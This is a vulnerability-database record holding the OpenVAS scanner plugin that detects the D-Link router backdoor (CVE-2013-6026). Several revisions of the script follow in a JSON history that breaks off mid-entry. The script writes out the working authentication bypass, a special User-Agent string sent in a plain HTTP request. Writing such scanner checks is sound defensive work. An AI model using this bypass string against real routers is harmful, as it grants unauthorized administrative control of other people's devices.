ID OPENVAS:1361412562310103810 Type openvas Reporter This script is Copyright (C) 2013 Greenbone Networks GmbH Modified 2018-10-12T00:00:00
Description
Various D-Link DSL routers are susceptible to a remote authentication
bypass vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_dlink_multiple_devices_backdoor_10_2013.nasl 11865 2018-10-12 10:03:43Z cfischer $
#
# D-Link Multiple Devices Backdoor
#
# Authors:
# Michael Meyer <michael.meyer@greenbone.net>
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103810");
script_version("$Revision: 11865 $");
script_cve_id("CVE-2013-6026");
script_bugtraq_id(62990);
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_name("D-Link Multiple Devices Backdoor");
script_xref(name:"URL", value:"http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/");
script_xref(name:"URL", value:"http://www.d-link.com/");
script_tag(name:"last_modification", value:"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $");
script_tag(name:"creation_date", value:"2013-10-14 19:24:10 +0200 (Mon, 14 Oct 2013)");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_family("Web application abuses");
script_copyright("This script is Copyright (C) 2013 Greenbone Networks GmbH");
script_dependencies("gb_get_http_banner.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("thttpd-alphanetworks/banner");
script_tag(name:"impact", value:"This vulnerability allows remote attackers to gain complete
administrative access to affected devices.");
script_tag(name:"vuldetect", value:"Try to bypass authentication by using 'xmlset_roodkcableoj28840ybtide' as HTTP User-Agent.");
script_tag(name:"insight", value:"By setting the User-Agent header to 'xmlset_roodkcableoj28840ybtide', it is
possible to access the web interface without any authentication.");
script_tag(name:"solution", value:"Ask the Vendor for an update.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"summary", value:"Various D-Link DSL routers are susceptible to a remote authentication
bypass vulnerability.");
script_tag(name:"affected", value:"Various D-Link routers are affected.");
exit(0);
}
include("http_func.inc");
port = get_http_port(default:80);
banner = get_http_banner(port:port);
if(!banner || ("thttpd-alphanetworks" >!< banner && "Alpha_webserv" >!< banner))exit(0);
host = http_host_name(port:port);
req = 'GET / HTTP/1.1\r\n' +
'Host: ' + host + '\r\n';
result = http_send_recv(port:port, data:req + '\r\n', bodyonly:FALSE);
if(result !~ "HTTP/1.. (401|302)" || "self.location.href" >< result)exit(0);
req += 'User-Agent: xmlset_roodkcableoj28840ybtide\r\n';
result = http_send_recv(port:port, data:req + '\r\n', bodyonly:FALSE);
if(result =~ "HTTP/1.. 200" || (result !~ "HTTP/1" && "self.location.href" >< result)) {
security_message(port:port);
exit(0);
}
exit(99);
{"id": "OPENVAS:1361412562310103810", "bulletinFamily": "scanner", "title": "D-Link Multiple Devices Backdoor", "description": "Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.", "published": "2013-10-14T00:00:00", "modified": "2018-10-12T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103810", "reporter": "This script is Copyright (C) 2013 Greenbone Networks GmbH", "references": ["http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/", "http://www.d-link.com/"], "cvelist": ["CVE-2013-6026"], "type": "openvas", "lastseen": "2019-05-29T18:37:59", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-6026"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.", "edition": 6, "enchantments": {"dependencies": {"modified": "2018-10-22T16:41:40", "references": [{"idList": ["VU:248083"], "type": "cert"}, {"idList": ["PACKETSTORM:123848"], "type": "packetstorm"}, {"idList": ["CVE-2013-6026"], "type": "cve"}, {"idList": ["DLINK_ROUTER_USER_AGENT_AUTH_BYPASS.NASL"], "type": "nessus"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "c0e1075a4ebda0734ea6d928005f1d427eb6ff5c443a4a2628653d66697932be", "hashmap": [{"hash": "421e76e9ab8acea739e471557ba0972a", "key": "title"}, {"hash": "8be90a922e3fddc17514b9fd17f39e9b", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "d8fe80eceeb50388ccd28092dcb46448", "key": "pluginID"}, {"hash": "241b1a09dade3b551c9ee7962ca9bfe2", "key": "href"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "9f7dccc7b49b13b7e193ec41f56bf6fb", "key": "sourceData"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "cc6103a83dab7756770a7759ed375417", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "62e9ecc3d5f2308a87c0f33e4ea8671e", "key": "description"}, {"hash": "8575eeab9770297afdf096c6d7fa3964", "key": "published"}, {"hash": "c8c11c18def3783b9fd2759746494ece", "key": "reporter"}, {"hash": "b7b74fcd6ba53f37bce86b9b19fcdcd9", "key": "references"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103810", "id": "OPENVAS:1361412562310103810", "lastseen": "2018-10-22T16:41:40", "modified": "2018-10-12T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310103810", "published": "2013-10-14T00:00:00", "references": ["http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/", "http://www.d-link.com/"], "reporter": "This script is Copyright (C) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_multiple_devices_backdoor_10_2013.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# D-Link Multiple Devices Backdoor\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103810\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-6026\");\n script_bugtraq_id(62990);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"D-Link Multiple Devices Backdoor\");\n\n\n script_xref(name:\"URL\", value:\"http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/\");\n script_xref(name:\"URL\", value:\"http://www.d-link.com/\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-14 19:24:10 +0200 (Mon, 14 Oct 2013)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"thttpd-alphanetworks/banner\");\n\n script_tag(name:\"impact\", value:\"This vulnerability allows remote attackers to gain complete\nadministrative access to affected devices.\");\n script_tag(name:\"vuldetect\", value:\"Try to bypass authentication by using 'xmlset_roodkcableoj28840ybtide' as HTTP User-Agent.\");\n script_tag(name:\"insight\", value:\"By setting the User-Agent header to 'xmlset_roodkcableoj28840ybtide', it is\npossible to access the web interface without any authentication.\");\n script_tag(name:\"solution\", value:\"Ask the Vendor for an update.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.\");\n script_tag(name:\"affected\", value:\"Various D-Link routers are affected.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nbanner = get_http_banner(port:port);\nif(!banner || (\"thttpd-alphanetworks\" >!< banner && \"Alpha_webserv\" >!< banner))exit(0);\n\nhost = http_host_name(port:port);\n\nreq = 'GET / HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result !~ \"HTTP/1.. (401|302)\" || \"self.location.href\" >< result)exit(0);\n\nreq += 'User-Agent: xmlset_roodkcableoj28840ybtide\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result =~ \"HTTP/1.. 200\" || (result !~ \"HTTP/1\" && \"self.location.href\" >< result)) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "title": "D-Link Multiple Devices Backdoor", "type": "openvas", "viewCount": 6}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-10-22T16:41:40"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-6026"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "d0efd05b395d276cf78be6cd937407b27d213a354623162d95e58df53f1331b0", "hashmap": [{"hash": "421e76e9ab8acea739e471557ba0972a", "key": "title"}, {"hash": "0530763348db5d3f8590378278de71b4", "key": "sourceData"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "d8fe80eceeb50388ccd28092dcb46448", "key": "pluginID"}, {"hash": "602bced6320cec4ab33d131e0b746b65", "key": "modified"}, {"hash": "241b1a09dade3b551c9ee7962ca9bfe2", "key": "href"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "cc6103a83dab7756770a7759ed375417", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "62e9ecc3d5f2308a87c0f33e4ea8671e", "key": "description"}, {"hash": "8575eeab9770297afdf096c6d7fa3964", "key": "published"}, {"hash": "c8c11c18def3783b9fd2759746494ece", "key": "reporter"}, {"hash": "b7b74fcd6ba53f37bce86b9b19fcdcd9", "key": "references"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103810", "id": "OPENVAS:1361412562310103810", "lastseen": "2017-07-27T10:51:40", "modified": "2017-07-12T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310103810", "published": "2013-10-14T00:00:00", "references": ["http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/", "http://www.d-link.com/"], "reporter": "This script is Copyright (C) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_multiple_devices_backdoor_10_2013.nasl 6698 2017-07-12 12:00:17Z cfischer $\n#\n# D-Link Multiple Devices Backdoor\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nSCRIPT_OID = \"1.3.6.1.4.1.25623.1.0.103810\";\n\ntag_insight = \"By setting the User-Agent header to 'xmlset_roodkcableoj28840ybtide', it is\npossible to access the web interface without any authentication.\";\n\ntag_impact = \"This vulnerability allows remote attackers to gain complete\nadministrative access to affected devices.\";\n\ntag_affected = \"Various D-Link routers are affected.\";\n\ntag_summary = \"Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.\";\n\ntag_solution = \"Ask the Vendor for an update.\";\ntag_vuldetect = \"Try to bypass authentication by using 'xmlset_roodkcableoj28840ybtide' as HTTP User-Agent.\";\n\nif (description)\n{\n script_oid(SCRIPT_OID);\n script_version (\"$Revision: 6698 $\");\n script_cve_id(\"CVE-2013-6026\");\n script_bugtraq_id(62990);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"D-Link Multiple Devices Backdoor\");\n\n\n script_xref(name:\"URL\", value:\"http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/\");\n script_xref(name:\"URL\", value:\"http://www.d-link.com/\");\n \n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 14:00:17 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-14 19:24:10 +0200 (Mon, 14 Oct 2013)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"thttpd-alphanetworks/banner\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"vuldetect\" , value : tag_vuldetect);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n \nport = get_http_port(default:80);\n\nbanner = get_http_banner(port:port);\nif(!banner || (\"thttpd-alphanetworks\" >!< banner && \"Alpha_webserv\" >!< banner))exit(0);\n\nhost = http_host_name(port:port);\n\nreq = 'GET / HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result !~ \"HTTP/1.. (401|302)\" || \"self.location.href\" >< result)exit(0);\n\nreq += 'User-Agent: xmlset_roodkcableoj28840ybtide\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result =~ \"HTTP/1.. 200\" || (result !~ \"HTTP/1\" && \"self.location.href\" >< result)) {\n security_message(port:port);\n exit(0);\n} \n\nexit(99);\n", "title": "D-Link Multiple Devices Backdoor", "type": "openvas", "viewCount": 5}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-07-27T10:51:40"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-6026"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.", "edition": 1, "enchantments": {}, "hash": "7e10989777fddefe0af7f50d576d6ff128af277ab9dec47725c5b00d0ea19084", "hashmap": [{"hash": "421e76e9ab8acea739e471557ba0972a", "key": "title"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "d8fe80eceeb50388ccd28092dcb46448", "key": "pluginID"}, {"hash": "1612e388ff2724b7a822f3dfdd61a65d", "key": "modified"}, {"hash": "241b1a09dade3b551c9ee7962ca9bfe2", "key": "href"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "cc6103a83dab7756770a7759ed375417", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "62e9ecc3d5f2308a87c0f33e4ea8671e", "key": "description"}, {"hash": "8575eeab9770297afdf096c6d7fa3964", "key": "published"}, {"hash": "c8c11c18def3783b9fd2759746494ece", "key": "reporter"}, {"hash": "b7b74fcd6ba53f37bce86b9b19fcdcd9", "key": "references"}, {"hash": "a0d1f942ebe20e569e2856c9c95b416c", "key": "sourceData"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103810", "id": "OPENVAS:1361412562310103810", "lastseen": "2017-07-02T21:11:14", "modified": "2017-05-11T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310103810", "published": "2013-10-14T00:00:00", "references": ["http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/", "http://www.d-link.com/"], "reporter": "This script is Copyright (C) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_multiple_devices_backdoor_10_2013.nasl 6104 2017-05-11 09:03:48Z teissa $\n#\n# D-Link Multiple Devices Backdoor\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nSCRIPT_OID = \"1.3.6.1.4.1.25623.1.0.103810\";\n\ntag_insight = \"By setting the User-Agent header to 'xmlset_roodkcableoj28840ybtide', it is\npossible to access the web interface without any authentication.\";\n\ntag_impact = \"This vulnerability allows remote attackers to gain complete\nadministrative access to affected devices.\";\n\ntag_affected = \"Various D-Link routers are affected.\";\n\ntag_summary = \"Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.\";\n\ntag_solution = \"Ask the Vendor for an update.\";\ntag_vuldetect = \"Try to bypass authentication by using 'xmlset_roodkcableoj28840ybtide' as HTTP User-Agent.\";\n\nif (description)\n{\n script_oid(SCRIPT_OID);\n script_version (\"$Revision: 6104 $\");\n script_cve_id(\"CVE-2013-6026\");\n script_bugtraq_id(62990);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"D-Link Multiple Devices Backdoor\");\n\n\n script_xref(name:\"URL\", value:\"http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/\");\n script_xref(name:\"URL\", value:\"http://www.d-link.com/\");\n \n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-11 11:03:48 +0200 (Thu, 11 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-14 19:24:10 +0200 (Mon, 14 Oct 2013)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"thttpd-alphanetworks/banner\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"vuldetect\" , value : tag_vuldetect);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n \nport = get_http_port(default:8080);\nif(!get_port_state(port))exit(0);\n\nbanner = get_http_banner(port:port);\nif(!banner || (\"thttpd-alphanetworks\" >!< banner && \"Alpha_webserv\" >!< banner))exit(0);\n\nhost = get_host_name();\n\nreq = 'GET / HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result !~ \"HTTP/1.. (401|302)\" || \"self.location.href\" >< result)exit(0);\n\nreq += 'User-Agent: xmlset_roodkcableoj28840ybtide\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result =~ \"HTTP/1.. 200\" || (result !~ \"HTTP/1\" && \"self.location.href\" >< result)) {\n security_message(port:port);\n exit(0);\n} \n\nexit(99);\n", "title": "D-Link Multiple Devices Backdoor", "type": "openvas", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:11:14"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-6026"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "9fe48c54f45069b41cb5b5993d719b6ccae97ba7f28e9c9a46ead95330c1c340", "hashmap": [{"hash": "511df484334bdb865662d79e01707098", "key": "sourceData"}, {"hash": "421e76e9ab8acea739e471557ba0972a", "key": "title"}, {"hash": "4b7feb38fd76554e0bdb602a6c931423", "key": "modified"}, {"hash": "d8fe80eceeb50388ccd28092dcb46448", "key": "pluginID"}, {"hash": "241b1a09dade3b551c9ee7962ca9bfe2", "key": "href"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "cc6103a83dab7756770a7759ed375417", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "62e9ecc3d5f2308a87c0f33e4ea8671e", "key": "description"}, {"hash": "8575eeab9770297afdf096c6d7fa3964", "key": "published"}, {"hash": "c8c11c18def3783b9fd2759746494ece", "key": "reporter"}, {"hash": "b7b74fcd6ba53f37bce86b9b19fcdcd9", "key": "references"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103810", "id": "OPENVAS:1361412562310103810", "lastseen": "2018-08-30T19:24:35", "modified": "2018-08-23T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310103810", "published": "2013-10-14T00:00:00", "references": ["http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/", "http://www.d-link.com/"], "reporter": "This script is Copyright (C) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_multiple_devices_backdoor_10_2013.nasl 11096 2018-08-23 12:49:10Z mmartin $\n#\n# D-Link Multiple Devices Backdoor\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103810\");\n script_version(\"$Revision: 11096 $\");\n script_cve_id(\"CVE-2013-6026\");\n script_bugtraq_id(62990);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"D-Link Multiple Devices Backdoor\");\n\n\n script_xref(name:\"URL\", value:\"http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/\");\n script_xref(name:\"URL\", value:\"http://www.d-link.com/\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-23 14:49:10 +0200 (Thu, 23 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-14 19:24:10 +0200 (Mon, 14 Oct 2013)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"thttpd-alphanetworks/banner\");\n\n script_tag(name:\"impact\", value:\"This vulnerability allows remote attackers to gain complete\nadministrative access to affected devices.\");\n script_tag(name:\"vuldetect\", value:\"Try to bypass authentication by using 'xmlset_roodkcableoj28840ybtide' as HTTP User-Agent.\");\n script_tag(name:\"insight\", value:\"By setting the User-Agent header to 'xmlset_roodkcableoj28840ybtide', it is\npossible to access the web interface without any authentication.\");\n script_tag(name:\"solution\", value:\"Ask the Vendor for an update.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.\");\n script_tag(name:\"affected\", value:\"Various D-Link routers are affected.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nbanner = get_http_banner(port:port);\nif(!banner || (\"thttpd-alphanetworks\" >!< banner && \"Alpha_webserv\" >!< banner))exit(0);\n\nhost = http_host_name(port:port);\n\nreq = 'GET / HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result !~ \"HTTP/1.. (401|302)\" || \"self.location.href\" >< result)exit(0);\n\nreq += 'User-Agent: xmlset_roodkcableoj28840ybtide\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result =~ \"HTTP/1.. 200\" || (result !~ \"HTTP/1\" && \"self.location.href\" >< result)) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "title": "D-Link Multiple Devices Backdoor", "type": "openvas", "viewCount": 5}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:24:35"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-6026"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "9354c06e1ef0e69c0ea32ef9b9990d5e01ada6a14341cc00ad3ed67e2abc6803", "hashmap": [{"hash": "511df484334bdb865662d79e01707098", "key": "sourceData"}, {"hash": "421e76e9ab8acea739e471557ba0972a", "key": "title"}, {"hash": "4b7feb38fd76554e0bdb602a6c931423", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "d8fe80eceeb50388ccd28092dcb46448", "key": "pluginID"}, {"hash": "241b1a09dade3b551c9ee7962ca9bfe2", "key": "href"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "cc6103a83dab7756770a7759ed375417", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "62e9ecc3d5f2308a87c0f33e4ea8671e", "key": "description"}, {"hash": "8575eeab9770297afdf096c6d7fa3964", "key": "published"}, {"hash": "c8c11c18def3783b9fd2759746494ece", "key": "reporter"}, {"hash": "b7b74fcd6ba53f37bce86b9b19fcdcd9", "key": "references"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103810", "id": "OPENVAS:1361412562310103810", "lastseen": "2018-08-24T21:34:15", "modified": "2018-08-23T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310103810", "published": 